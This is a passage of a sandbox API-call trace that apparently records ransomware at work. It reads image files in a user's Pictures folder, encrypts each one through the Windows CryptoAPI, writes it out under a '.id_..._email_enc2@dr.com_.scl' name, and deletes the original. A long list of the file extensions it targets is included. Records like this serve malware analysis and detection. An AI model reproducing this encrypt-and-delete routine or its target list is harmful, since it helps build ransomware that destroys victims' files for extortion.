returned=".gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0197.249] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0197.250] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0197.250] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hg5hwqecsvicbr7x.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hg5hwqecsvicbr7x.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0197.251] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x11ad4, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x11ad4, lpOverlapped=0x0) returned 1
	[0197.253] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.254] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb2a8) returned 1
	[0197.255] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.255] CryptCreateHash (in: hProv=0xfcb2a8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0197.255] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.255] CryptHashData (hHash=0xfb9b30, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0197.256] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.256] CryptDeriveKey (in: hProv=0xfcb2a8, Algid=0x6610, hBaseData=0xfb9b30, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb93b0) returned 1
	[0197.256] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.256] CryptEncrypt (in: hKey=0xfb93b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x11ad4, dwBufLen=0x11ad4 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x11ae0) returned 1
	[0197.261] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0197.263] RtlMoveMemory (in: Destination=0xfeec60, Source=0xfdd180, Length=0x11ad4 | out: Destination=0xfeec60) 
	[0197.264] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.265] CryptEncrypt (in: hKey=0xfb93b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfeec60*, pdwDataLen=0x18aefc*=0x11ad4, dwBufLen=0x11ae0 | out: pbData=0xfeec60*, pdwDataLen=0x18aefc*=0x11ae0) returned 1
	[0197.266] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.266] CryptDestroyKey (hKey=0xfb93b0) returned 1
	[0197.266] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.266] CryptDestroyHash (hHash=0xfb9b30) returned 1
	[0197.266] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.266] CryptReleaseContext (hProv=0xfcb2a8, dwFlags=0x0) returned 1
	[0197.266] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0197.267] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0197.267] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.268] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0197.269] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hg5hwqecsvicbr7x.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 106
	[0197.269] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hg5hwqecsvicbr7x.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hg5hwqecsvicbr7x.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0197.270] WriteFile (in: hFile=0x388, lpBuffer=0xfeec60*, nNumberOfBytesToWrite=0x11ae0, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfeec60*, lpNumberOfBytesWritten=0x18b358*=0x11ae0, lpOverlapped=0x0) returned 1
	[0197.280] CloseHandle (hObject=0x388) returned 1
	[0197.280] CloseHandle (hObject=0x2c0) returned 1
	[0197.280] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hg5hwqecsvicbr7x.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hg5hwqecsvicbr7x.gif")) returned 1
	[0197.287] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hg5hwqecsvicbr7x.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hg5hwqecsvicbr7x.gif")) returned 0
	[0197.287] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a3293f0, ftCreationTime.dwHighDateTime=0x1d9744c, ftLastAccessTime.dwLowDateTime=0x4f186740, ftLastAccessTime.dwHighDateTime=0x1d974f1, ftLastWriteTime.dwLowDateTime=0x4f186740, ftLastWriteTime.dwHighDateTime=0x1d974f1, nFileSizeHigh=0x0, nFileSizeLow=0x156ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hp_ehY49u8gTIO_zgw.gif", cAlternateFileName="HP_EHY~1.GIF")) returned 1
	[0197.288] lstrcmpW (lpString1="Hp_ehY49u8gTIO_zgw.gif", lpString2="..") returned 1
	[0197.288] lstrcmpW (lpString1="Hp_ehY49u8gTIO_zgw.gif", lpString2=".") returned 1
	[0197.288] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\"
	[0197.288] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\", lpString2="Hp_ehY49u8gTIO_zgw.gif" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\Hp_ehY49u8gTIO_zgw.gif") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\Hp_ehY49u8gTIO_zgw.gif"
	[0197.288] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\Hp_ehY49u8gTIO_zgw.gif") returned 66
	[0197.288] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0197.288] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\Hp_ehY49u8gTIO_zgw.gif", cchLength=0x42 | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hp_ehy49u8gtio_zgw.gif") returned 0x42
	[0197.289] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0197.289] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hp_ehy49u8gtio_zgw.gif", lpSrch="help_decrypt_your_files") returned 0x0
	[0197.289] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hp_ehy49u8gtio_zgw.gif" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hp_ehy49u8gtio_zgw.gif") returned="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hp_ehy49u8gtio_zgw.gif"
	[0197.289] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hp_ehy49u8gtio_zgw.gif") returned 66
	[0197.289] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0197.289] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0197.290] StrStrW (lpFirst=".gif", lpSrch=".") returned=".gif"
	[0197.290] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0197.290] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".gif") returned=".gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0197.290] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0197.291] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0197.291] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hp_ehy49u8gtio_zgw.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hp_ehy49u8gtio_zgw.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0197.296] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x156ad, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x156ad, lpOverlapped=0x0) returned 1
	[0197.300] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.300] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb330) returned 1
	[0197.303] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.303] CryptCreateHash (in: hProv=0xfcb330, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0197.303] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.303] CryptHashData (hHash=0xfb9b30, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0197.304] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.304] CryptDeriveKey (in: hProv=0xfcb330, Algid=0x6610, hBaseData=0xfb9b30, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb90f0) returned 1
	[0197.304] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.304] CryptEncrypt (in: hKey=0xfb90f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x156ad, dwBufLen=0x156ad | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x156b0) returned 1
	[0197.315] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0197.315] RtlMoveMemory (in: Destination=0xff2838, Source=0xfdd180, Length=0x156ad | out: Destination=0xff2838) 
	[0197.315] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.315] CryptEncrypt (in: hKey=0xfb90f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff2838*, pdwDataLen=0x18aefc*=0x156ad, dwBufLen=0x156b0 | out: pbData=0xff2838*, pdwDataLen=0x18aefc*=0x156b0) returned 1
	[0197.316] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.316] CryptDestroyKey (hKey=0xfb90f0) returned 1
	[0197.316] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.316] CryptDestroyHash (hHash=0xfb9b30) returned 1
	[0197.317] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.317] CryptReleaseContext (hProv=0xfcb330, dwFlags=0x0) returned 1
	[0197.317] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0197.317] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0197.318] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.318] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0197.319] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hp_ehy49u8gtio_zgw.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 108
	[0197.319] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hp_ehy49u8gtio_zgw.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\hp_ehy49u8gtio_zgw.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0197.320] WriteFile (in: hFile=0x388, lpBuffer=0xff2838*, nNumberOfBytesToWrite=0x156b0, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xff2838*, lpNumberOfBytesWritten=0x18b358*=0x156b0, lpOverlapped=0x0) returned 1
	[0197.330] CloseHandle (hObject=0x388) returned 1
	[0197.330] CloseHandle (hObject=0x2c0) returned 1
